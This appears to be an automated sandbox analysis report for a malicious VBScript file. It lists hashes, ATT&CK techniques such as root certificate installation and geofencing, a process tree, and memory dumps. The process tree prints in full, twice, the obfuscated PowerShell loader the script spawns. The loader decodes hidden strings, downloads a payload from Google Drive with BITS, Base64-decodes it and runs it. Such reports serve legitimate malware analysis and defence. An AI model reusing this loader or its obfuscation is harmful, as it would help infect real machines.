275c5642252d7cd2c4a8dd5b80acd3a3b2492d9565cdfa035ffe7d777f4e4c1f

General

Target

arbejdsommere.vbs
Size

26KB
MD5

f8577629aeb64e251b9cb1e099e714d0
SHA1

5f0a623045c49b2d7ae72bcbd66ada317e4f03e2
SHA256

8d506a06bb82e85988a2b5be1e4ec782667ef2b5252f16a46adcc75e92077ef7
SHA512

52d6f17ce06caeaa1871a510d323598fe13fb67dacc6d01eb538bf0ad329e37fac28e33e27cf29725c08a3f40fb3a6042df5d6372dbcc499f9e00c932b69479c
SSDEEP

768:qaIZCEG9cNFeKAqIqBW2MQK/fFXSiPwKYv:2CJcviqzjOSiPwjv

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	4196	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
44	drive.google.com
45	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1804	2764	WerFault.exe	94

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 040000000100000010000000d5e98140c51869fc462c8975620faa780f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df153000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b0020004300410000006200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e1400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f71d0000000100000010000000e3f9af952c6df2aaa41706a77a44c20303000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1900000001000000100000001f7e750b566b128ac0b8d6576d2a70a52000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 5c0000000100000004000000000800001900000001000000100000001f7e750b566b128ac0b8d6576d2a70a503000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1d0000000100000010000000e3f9af952c6df2aaa41706a77a44c2031400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f76200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e0b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b002000430041000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df1040000000100000010000000d5e98140c51869fc462c8975620faa782000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	WScript.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3704	powershell.exe
3704	powershell.exe
2764	powershell.exe
2764	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3704	powershell.exe
Token: SeDebugPrivilege	2764	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 4196 wrote to memory of 3704	4196	WScript.exe	91
PID 4196 wrote to memory of 3704	4196	WScript.exe	91
PID 3704 wrote to memory of 2764	3704	powershell.exe	94
PID 3704 wrote to memory of 2764	3704	powershell.exe	94
PID 3704 wrote to memory of 2764	3704	powershell.exe	94

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\arbejdsommere.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Fjernvarmevrks='Frosh41:\Totemic';Set-Content $Fjernvarmevrks 'Cismontane';$Tandlgeklinikkernes=Test-Path $Fjernvarmevrks;if($Tandlgeklinikkernes){exit};function Asser9 ($Liquidable){For($Folkekommunen=4; $Folkekommunen -lt $Liquidable.Length-1; $Folkekommunen+=5){$Posttyper=$Posttyper+$Liquidable.'Substring'($Folkekommunen, 1)};$Posttyper;}$Indbytningens=Asser9 ' TeahCiv,tAfsktSymppH.ersAf y: Mas/.ttr/MocsdProgrSkali ,ofvAfraeRasu.P.rsgFaglo F.eo E agAntilHa.de Rfc.Bra,cForfoCompmArtv/Jardu .nhcEpig?Disce.oenx erpQui.oColorCapitNa u= TuddvgteoSaakwUnfonBunglLigeo K.baUds,dUd,t& An i Aspd Se =Taft1SelviSlukDTitiQ.ustZ .vedskaaFPreaU DaaX sm ANonpQ,ownToptaiRemoeFociKTur,cO tipBundJDusk8AfstjGldeAGenntFo,sZ AnozP da5SpisebagkA,jerDTu ehtrim9Divel TrsSMishsProv ';$Posttyper01=Asser9 ' BariHa,hes,nsxForm ';$Afsveden = Asser9 ' tu\ ndesPhysygen.sArchw,tyroFarvw.lee6Brod4Lsty\DedeWGr,si .epn SardnonsoSkatwSpassReevPHeteoUtriwUs ueRobirBrusSDod,hGldee Un,lE.nalMang\ F.rvSul.1 Bud. G p0Pott\Broap PsyoPosow.enseNomirEngusCliohFinaeSkudlTrohlDill.Rec,eErgaxBoure.ese ';&($Posttyper01) (Asser9 'B,od$ ,veFSti,r st.osuffsBackh Ar,4Biza1Ran,2Tids=Vag,$NonpefestnPrmivPr,b: IndwNonjiTietnkrond StviFagor han ') ;&($Posttyper01) (Asser9 'Flec$.ndeAGingfprissVag,vBil eSe.udBffeeCyclnFi,e=Ande$AlumF Ti rB,kooStepsTreehFire4 Anv1.pst2Fo.s+Inte$DiasAmarkf Tons.ambvUnfueFl ed.nugeH zlnKoll ') ;&($Posttyper01) (Asser9 ' B l$Quinc Sekoforml.manu ,vimEvolb,heriKlovdEpim Sup=Afsl b s( Une(.esagUnwowBehomnondiJu.i ,quew KomiBridnBryl3Pai 2Funi_Grogp Ku r Frposparcsk,be,uppsOpk.sHund Lyds- ,idFBebu ProPInt.r,anto Benc IdeeKarasP,otsKrimIl byd Blo=Klge$Sult{ k aPUncoIUndiDsags} Ant)A.ve. BasCBlaao ricmTeknmUdspaWastnCo.sd LocLmuseiMet n CogePi.e) ,en Husa-Todds I.gpK,ltlF.coiFlo.tSpro Unha[Dommc,oleh.imiaScorrBro,] Eu 3,eks4Salv ');&($Posttyper01) (Asser9 'lymp$SploK ,ame kitrbeg,cGhazh .rsiKvareP,eufsitusB sm Sain=Subn Sk.l$Spe,c ykoForkl Banu EksmEnlibPeariLarydKoal[M,nt$Tin,cHjrsoOut.lArchuGriemDemob Sa.iL.sadSta..KallcO,tqo AuduOverndolmtUmen-Levn2 Sy ]Huk ');&($Posttyper01) (Asser9 'Be.g$TannEBrasmNit.uSynclA.naaMyecnAntitele.=Ting( k jTTchae ids Stat Udv-SuccPMurea Aktt,iljhKart Tres$ShelABestfNuncsS.elvAf,le DepdFirkeS,aan ec)Yalb Ukri- S lAMasknEndod Di Dagi(Zymo[Ung.I.ysbnAn.ht.yltPHadet OverL,se]Fri : Irl:Pokes Titi OrtzHyd.eTelp ,ust-.ptaeAdveqIcht Affe8Pied) ov. ') ;if ($Emulant) {&$Afsveden $Kerchiefs;} else {;$Posttyper00=Asser9 'TireS.emptMejsaP,rcrL,vetEst -EkshB Expi,ibotUdenswichTU,ikr R faAguinRetrs Ef f eske Fllrskns Suc,- TofSAppeoAutouDysfr SubcAutoeHemi Jonb$WrinISiden P cd nmbTorvyaltetOrchnElsdi Ti,novergScineAposnEn.os ved Uni,- TelD,nbeeindusWilitGldsiKi.knP,euaJulltdistiGrano.tvnn rue Ser,$ ForFSpelrUdm.oHerosSommhT.il4Anda1Hill2B.dg ';&($Posttyper01) (Asser9 'Bana$ BlaFPollrTtnioFlelsSmerhChec4Tote1 Ar.2,ndr=delp$Placekompn,nnev.api: Fo aA,erp.rrep CondDe,paGnubtArbeaPriv ') ;&($Posttyper01) (Asser9 ',ocuI UndmAul pZenio T,wrPalctU,wo-ImplMMulloFiskdDediu DenlC ireLock F reBFa.tiPizatH,sts RumTFrakr Oola ,omnSphesBirafMockeOpslrBurm ') ;$Frosh412=$Frosh412+'\Angrebskrigs.Var';while (-not $Lepidopteron) {&($Posttyper01) (Asser9 'Sapo$DiscLT.nse MespDiktiU.opdStaroIs.lpEgoctRe.ueAfrurbr,doSigtn Ope=s.mp( Cr,TAnstekills RentP,eu-In,xPregiaUni tFladhKnok Lege$fr tF,ishrPerio ridsR fuhUnce4Hera1 .el2Lerv)Pamp ') ;&($Posttyper01) $Posttyper00;&($Posttyper01) (Asser9 ' F rS hretVagea,temrSu.ctPedo-ankeS andlQuebe viveReetpS.rm Lang5Baha ');}&($Posttyper01) (Asser9 ' Afg$PaddATy.ksA masInteeReberOta Nonf=Phon botGdelie .ontLign-Xi,hCUnmuoViden.maatRodee ampnFuldtDy,l Papi$DuckFSeptrSuovoMarbs SkjhA,mi4Just1Tele2 Cas ');&($Posttyper01) (Asser9 'Ild.$DefeSafd.lOsteyWorkn HavgSibyeS lel orlsRadit Foru.rfte,avarMargsTric Dish= ern Cu p[Gra.SFuksy .aksvol tTrane ,semRaml.andaCAs roslu nstilvGreeepremrAgantBusc]Rumf:Ard,:HaanFLe,trSekso Pk m RadBbrugaLagds ndeeUnde6St a4RustSBihet onr Ko iMe,hnB.skgFile(Guis$ abeAWo,ksAndes GaseGabarPres)Jog. ');&($Posttyper01) (Asser9 ' rio$EjerP erroPornsA,letGrastpyroy TrapBorte panrP.la2 eol Aeth=Adju Af,l[ SanSMd.dySelus Hvat Rese ti.mfo s.Des,T SpleIsocx OrdtTref. GarEGrunnForec,ntro lecdMulti Ul,nB,ksgBesp],eca: .ve:RollAPrivSPsykCMiliI OveIPr,i.Y rkG AsceStent TolSSlett.injr f riBuganMaalgIndd(Yd,r$PrinSOtthlPro,yUnconLrergSydaeH tclPalasUddatKej uOssieMultr,atusRaml) oop ');&($Posttyper01) (Asser9 ' Ind$ A.lO EthvBizae SalrekspsSyndiEllegKunstGipssPensvSer iDuven Fl.d Forumed eEnce=obje$TripP Pi o GlosUlvet Folt CucySelvpUndeeforrr Far2parr. ElesSimuuFibrbAceps Fret Skor ,eciJupanPro gDoku( ins3Bron4P.yc7 Swa0S ud0Pudr6 ,me,Opkb3Geme6Gra 8Brad6 As.6Tede).rue ');&($Posttyper01) $Oversigtsvindue;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3704
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Fjernvarmevrks='Frosh41:\Totemic';Set-Content $Fjernvarmevrks 'Cismontane';$Tandlgeklinikkernes=Test-Path $Fjernvarmevrks;if($Tandlgeklinikkernes){exit};function Asser9 ($Liquidable){For($Folkekommunen=4; $Folkekommunen -lt $Liquidable.Length-1; $Folkekommunen+=5){$Posttyper=$Posttyper+$Liquidable.'Substring'($Folkekommunen, 1)};$Posttyper;}$Indbytningens=Asser9 ' TeahCiv,tAfsktSymppH.ersAf y: Mas/.ttr/MocsdProgrSkali ,ofvAfraeRasu.P.rsgFaglo F.eo E agAntilHa.de Rfc.Bra,cForfoCompmArtv/Jardu .nhcEpig?Disce.oenx erpQui.oColorCapitNa u= TuddvgteoSaakwUnfonBunglLigeo K.baUds,dUd,t& An i Aspd Se =Taft1SelviSlukDTitiQ.ustZ .vedskaaFPreaU DaaX sm ANonpQ,ownToptaiRemoeFociKTur,cO tipBundJDusk8AfstjGldeAGenntFo,sZ AnozP da5SpisebagkA,jerDTu ehtrim9Divel TrsSMishsProv ';$Posttyper01=Asser9 ' BariHa,hes,nsxForm ';$Afsveden = Asser9 ' tu\ ndesPhysygen.sArchw,tyroFarvw.lee6Brod4Lsty\DedeWGr,si .epn SardnonsoSkatwSpassReevPHeteoUtriwUs ueRobirBrusSDod,hGldee Un,lE.nalMang\ F.rvSul.1 Bud. G p0Pott\Broap PsyoPosow.enseNomirEngusCliohFinaeSkudlTrohlDill.Rec,eErgaxBoure.ese ';&($Posttyper01) (Asser9 'B,od$ ,veFSti,r st.osuffsBackh Ar,4Biza1Ran,2Tids=Vag,$NonpefestnPrmivPr,b: IndwNonjiTietnkrond StviFagor han ') ;&($Posttyper01) (Asser9 'Flec$.ndeAGingfprissVag,vBil eSe.udBffeeCyclnFi,e=Ande$AlumF Ti rB,kooStepsTreehFire4 Anv1.pst2Fo.s+Inte$DiasAmarkf Tons.ambvUnfueFl ed.nugeH zlnKoll ') ;&($Posttyper01) (Asser9 ' B l$Quinc Sekoforml.manu ,vimEvolb,heriKlovdEpim Sup=Afsl b s( Une(.esagUnwowBehomnondiJu.i ,quew KomiBridnBryl3Pai 2Funi_Grogp Ku r Frposparcsk,be,uppsOpk.sHund Lyds- ,idFBebu ProPInt.r,anto Benc IdeeKarasP,otsKrimIl byd Blo=Klge$Sult{ k aPUncoIUndiDsags} Ant)A.ve. BasCBlaao ricmTeknmUdspaWastnCo.sd LocLmuseiMet n CogePi.e) ,en Husa-Todds I.gpK,ltlF.coiFlo.tSpro Unha[Dommc,oleh.imiaScorrBro,] Eu 3,eks4Salv ');&($Posttyper01) (Asser9 'lymp$SploK ,ame kitrbeg,cGhazh .rsiKvareP,eufsitusB sm Sain=Subn Sk.l$Spe,c ykoForkl Banu EksmEnlibPeariLarydKoal[M,nt$Tin,cHjrsoOut.lArchuGriemDemob Sa.iL.sadSta..KallcO,tqo AuduOverndolmtUmen-Levn2 Sy ]Huk ');&($Posttyper01) (Asser9 'Be.g$TannEBrasmNit.uSynclA.naaMyecnAntitele.=Ting( k jTTchae ids Stat Udv-SuccPMurea Aktt,iljhKart Tres$ShelABestfNuncsS.elvAf,le DepdFirkeS,aan ec)Yalb Ukri- S lAMasknEndod Di Dagi(Zymo[Ung.I.ysbnAn.ht.yltPHadet OverL,se]Fri : Irl:Pokes Titi OrtzHyd.eTelp ,ust-.ptaeAdveqIcht Affe8Pied) ov. ') ;if ($Emulant) {&$Afsveden $Kerchiefs;} else {;$Posttyper00=Asser9 'TireS.emptMejsaP,rcrL,vetEst -EkshB Expi,ibotUdenswichTU,ikr R faAguinRetrs Ef f eske Fllrskns Suc,- TofSAppeoAutouDysfr SubcAutoeHemi Jonb$WrinISiden P cd nmbTorvyaltetOrchnElsdi Ti,novergScineAposnEn.os ved Uni,- TelD,nbeeindusWilitGldsiKi.knP,euaJulltdistiGrano.tvnn rue Ser,$ ForFSpelrUdm.oHerosSommhT.il4Anda1Hill2B.dg ';&($Posttyper01) (Asser9 'Bana$ BlaFPollrTtnioFlelsSmerhChec4Tote1 Ar.2,ndr=delp$Placekompn,nnev.api: Fo aA,erp.rrep CondDe,paGnubtArbeaPriv ') ;&($Posttyper01) (Asser9 ',ocuI UndmAul pZenio T,wrPalctU,wo-ImplMMulloFiskdDediu DenlC ireLock F reBFa.tiPizatH,sts RumTFrakr Oola ,omnSphesBirafMockeOpslrBurm ') ;$Frosh412=$Frosh412+'\Angrebskrigs.Var';while (-not $Lepidopteron) {&($Posttyper01) (Asser9 'Sapo$DiscLT.nse MespDiktiU.opdStaroIs.lpEgoctRe.ueAfrurbr,doSigtn Ope=s.mp( Cr,TAnstekills RentP,eu-In,xPregiaUni tFladhKnok Lege$fr tF,ishrPerio ridsR fuhUnce4Hera1 .el2Lerv)Pamp ') ;&($Posttyper01) $Posttyper00;&($Posttyper01) (Asser9 ' F rS hretVagea,temrSu.ctPedo-ankeS andlQuebe viveReetpS.rm Lang5Baha ');}&($Posttyper01) (Asser9 ' Afg$PaddATy.ksA masInteeReberOta Nonf=Phon botGdelie .ontLign-Xi,hCUnmuoViden.maatRodee ampnFuldtDy,l Papi$DuckFSeptrSuovoMarbs SkjhA,mi4Just1Tele2 Cas ');&($Posttyper01) (Asser9 'Ild.$DefeSafd.lOsteyWorkn HavgSibyeS lel orlsRadit Foru.rfte,avarMargsTric Dish= ern Cu p[Gra.SFuksy .aksvol tTrane ,semRaml.andaCAs roslu nstilvGreeepremrAgantBusc]Rumf:Ard,:HaanFLe,trSekso Pk m RadBbrugaLagds ndeeUnde6St a4RustSBihet onr Ko iMe,hnB.skgFile(Guis$ abeAWo,ksAndes GaseGabarPres)Jog. ');&($Posttyper01) (Asser9 ' rio$EjerP erroPornsA,letGrastpyroy TrapBorte panrP.la2 eol Aeth=Adju Af,l[ SanSMd.dySelus Hvat Rese ti.mfo s.Des,T SpleIsocx OrdtTref. GarEGrunnForec,ntro lecdMulti Ul,nB,ksgBesp],eca: .ve:RollAPrivSPsykCMiliI OveIPr,i.Y rkG AsceStent TolSSlett.injr f riBuganMaalgIndd(Yd,r$PrinSOtthlPro,yUnconLrergSydaeH tclPalasUddatKej uOssieMultr,atusRaml) oop ');&($Posttyper01) (Asser9 ' Ind$ A.lO EthvBizae SalrekspsSyndiEllegKunstGipssPensvSer iDuven Fl.d Forumed eEnce=obje$TripP Pi o GlosUlvet Folt CucySelvpUndeeforrr Far2parr. ElesSimuuFibrbAceps Fret Skor ,eciJupanPro gDoku( ins3Bron4P.yc7 Swa0S ud0Pudr6 ,me,Opkb3Geme6Gra 8Brad6 As.6Tede).rue ');&($Posttyper01) $Oversigtsvindue;}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2764
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 2308
      4⤵
      Program crash
      PID:1804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2764 -ip 2764
1⤵
PID:3516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5xqx15wm.jpf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2764-33-0x0000000006210000-0x0000000006564000-memory.dmp

Filesize
3.3MB

Download
memory/2764-21-0x0000000005810000-0x0000000005832000-memory.dmp

Filesize
136KB

Download
memory/2764-43-0x0000000075010000-0x00000000757C0000-memory.dmp

Filesize
7.7MB

Download
memory/2764-17-0x0000000075010000-0x00000000757C0000-memory.dmp

Filesize
7.7MB

Download
memory/2764-18-0x0000000002ED0000-0x0000000002EE0000-memory.dmp

Filesize
64KB

Download
memory/2764-16-0x0000000002DB0000-0x0000000002DE6000-memory.dmp

Filesize
216KB

Download
memory/2764-19-0x0000000002ED0000-0x0000000002EE0000-memory.dmp

Filesize
64KB

Download
memory/2764-34-0x00000000066E0000-0x00000000066FE000-memory.dmp

Filesize
120KB

Download
memory/2764-42-0x0000000007D60000-0x0000000007D74000-memory.dmp

Filesize
80KB

Download
memory/2764-22-0x00000000058B0000-0x0000000005916000-memory.dmp

Filesize
408KB

Download
memory/2764-41-0x0000000007CD0000-0x0000000007CF2000-memory.dmp

Filesize
136KB

Download
memory/2764-28-0x00000000060A0000-0x0000000006106000-memory.dmp

Filesize
408KB

Download
memory/2764-20-0x0000000005970000-0x0000000005F98000-memory.dmp

Filesize
6.2MB

Download
memory/2764-35-0x0000000006730000-0x000000000677C000-memory.dmp

Filesize
304KB

Download
memory/2764-36-0x00000000078B0000-0x0000000007946000-memory.dmp

Filesize
600KB

Download
memory/2764-37-0x0000000006BF0000-0x0000000006C0A000-memory.dmp

Filesize
104KB

Download
memory/2764-38-0x0000000006C40000-0x0000000006C62000-memory.dmp

Filesize
136KB

Download
memory/2764-39-0x0000000007F60000-0x0000000008504000-memory.dmp

Filesize
5.6MB

Download
memory/2764-40-0x0000000008B90000-0x000000000920A000-memory.dmp

Filesize
6.5MB

Download
memory/3704-14-0x00007FFA73BC0000-0x00007FFA74681000-memory.dmp

Filesize
10.8MB

Download
memory/3704-13-0x0000026F4BB00000-0x0000026F4BB22000-memory.dmp

Filesize
136KB

Download
memory/3704-15-0x0000026F4B8F0000-0x0000026F4B900000-memory.dmp

Filesize
64KB

Download
memory/3704-46-0x00007FFA73BC0000-0x00007FFA74681000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing